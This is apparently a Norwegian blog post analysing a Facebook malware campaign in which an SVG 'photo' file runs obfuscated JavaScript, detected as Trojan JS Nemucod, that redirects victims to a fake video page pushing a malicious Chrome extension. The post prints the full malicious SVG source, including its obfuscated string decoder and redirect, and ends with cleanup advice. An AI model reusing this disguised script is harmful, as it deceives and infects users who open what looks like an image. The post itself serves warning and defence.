Nå begynner en ny type skadevare og spres på Facebook. Det starter med at noen som er infisert får en melding med en fil de må åpne. Jeg skal få analysert hele denne svindelen.
Jeg sier alltid at det ikke er virus før det motsatte er bevist. Det gjør jeg her også. Det første jeg gjør det er å analysere bildefilen photo_8316.svg. Jeg bruker virus total som er en gratis virusskanner motor på internett. Den er det google som har laget og her skanner du filer og linker fra internett med opptil 54 viruscanne motorer fra mange selskaper. Det jeg finner her er heller mindre god lesing.
Som du ser så får jeg treff på 11 virusmotorer. Jeg tar en sjekk på Trojan JS. Nemucod. CX Den har hatt stor spredning før, men er vel på vei opp igjen nå. Det som skjer når du trykker på bildefilen. Så kjøres det ett javascript på din pc. Det er all koden som du ser under her:
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN”
“http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd”>
<svg version=”1.1″ xmlns=”http://www.w3.org/2000/svg”>
<circle cx=”250″ cy=”250″ r=”50″ fill=”red” />
<script type=”text/javascript”><![CDATA[
function jzvxu(ovdyen,xbcat,emgls){
var qxfbj = “ep.Z/1Jzj9kgENc_XKByPdbRsiM85YU3fSnTHAx4lv=r07OVt:hC?FL6muoI2GDa”;
var ljbid = [“oj5\/1c09:ze.RU_B6ZIECgbV3lkTiKfM8JAvYdL=FmNSuGhHs7?OxDy42ntaprXP”,”oKaGJYVTkfbvx1.sUrDL6tMndjSH:2gP08O=Zcpu359z_Iy?ihAeN7\/C4lRFBmEX”,”rXJgPI2C6\/G=:_b5AO41hBNf8ZsoLMDY90V3?UaxSmHtiEjnl.kezp7TcvyudRFK”,”ipjfYsGd326HzUurB1\/at?AkCV0TSlcg8hnI5R9ZPvM_Db7.L4EymONXKJxo=:eF”,”=PN4ec5gAuymXlfhSJ7H?sjRFL0Mki3ETrnGO8b6pCBUo_9KV1vZz.2:dItxD\/Ya”,”L29_cyi4zp5:0ZM=7AKBaf3Ft1sPIebh\/SRvEYOmJoVD6xdlCH?rgGnN8kuTXUj.”,”03bEzUjT4IRh\/pu.t2P7JKHiX8ny65LldYFmG?O=V9gaoMAe:Sr1f_ZcvBDkNxCs”];
var xzdvdq = “”;
var bszclj = 0;
while(ljbid[bszclj]){
bszclj++;
}
var synjv = 0;
while(ovdyen[synjv]){
var dloriu = 0;
var newpn = -1;
while(qxfbj[dloriu]){
if(qxfbj[dloriu]== ovdyen[synjv]){
newpn = dloriu;
break;
}
dloriu++;
}
if(newpn >= 0){
var dlkzpk = 0;
var xltllh = -1;
while(ljbid[synjv%bszclj][dlkzpk]){
if(ljbid[synjv%bszclj][dlkzpk]== ovdyen[synjv]){
xltllh = dlkzpk;
break;
}
dlkzpk++;
}
xzdvdq += qxfbj[xltllh];
}else{
xzdvdq += ovdyen[synjv];
}
synjv++;
}
var phiav = “”;
for(vmlrh=xbcat;vmlrh<xzdvdq.length;vmlrh++){
phiav += xzdvdq[vmlrh];
}
xzdvdq = phiav;
return xzdvdq;
}
var pritrj = window;
var gulrp = jzvxu(“tlN_j/4liyp”,8,false);
var dlmgvp = jzvxu(“sRN?U?Vt.KLLuF”,6,true);
var aebvqq = jzvxu(“wv=EULd”,3,false);
pritrj[gulrp][dlmgvp][aebvqq]= jzvxu(“oiGKvC:jhPYtMBFl9JvkRtaZLI2bjwPpv2zszvCV93?K”,4,true);
]]></script>
</svg>
Da blir alt dette over installert, men det stopper ikke der. Her er også mye av koden kryptert og det er uleselig. Når du har kjørt filen så kommer du videre til en nettside som ber dere installere en plugin i Google Chrome.
Når du installerer denne pluginen i Google Chrome er du med på å spre dette videre på Facebook. Dette er en av de verre Facebook virus jeg har vært borti til nå. Video vil du aldri få se desverre.
Vanligvis så kan man fjerne en plugin i Google Chrome også er alt fint, men ikke her.
- Her får du flere virus og trojanere installert på pc.
- Her får du også installert skadevare i Chrome.
Så her må du bruke flere programmer for få dette fjernet. Jeg anbefaler antivirus og antimalware.
Du må også tilbakestille Google Chrome for å renske opp i nettleseren. Det gjøres under avanserte instillinger.
For å bli infisert så må du gjøre følgene:
- Trykke på filen i melding
- Kjøre den
- Få installert virus på pc
- Gå til falsk videoside i Google Chrome
- Installere Chrome utvidelse
Så dette hopper ikke inn i pc`en av seg selv. Her tar nyskjerrigheten din overhånd.
Men dette er mer farlige saker. Har du fått dette på din pc og facebook konto.
Bytt passord på Facebook konto og scann pc for skadevare med en gang.
Jeg har kun fått testet dette viruset på Windows 10. Så jeg vet ikke åssen det spres på mac, iphone eller andre windows varianter.
For andre artikler se her, også sjekk ut oss på sosiale medier Facebook og Twitter.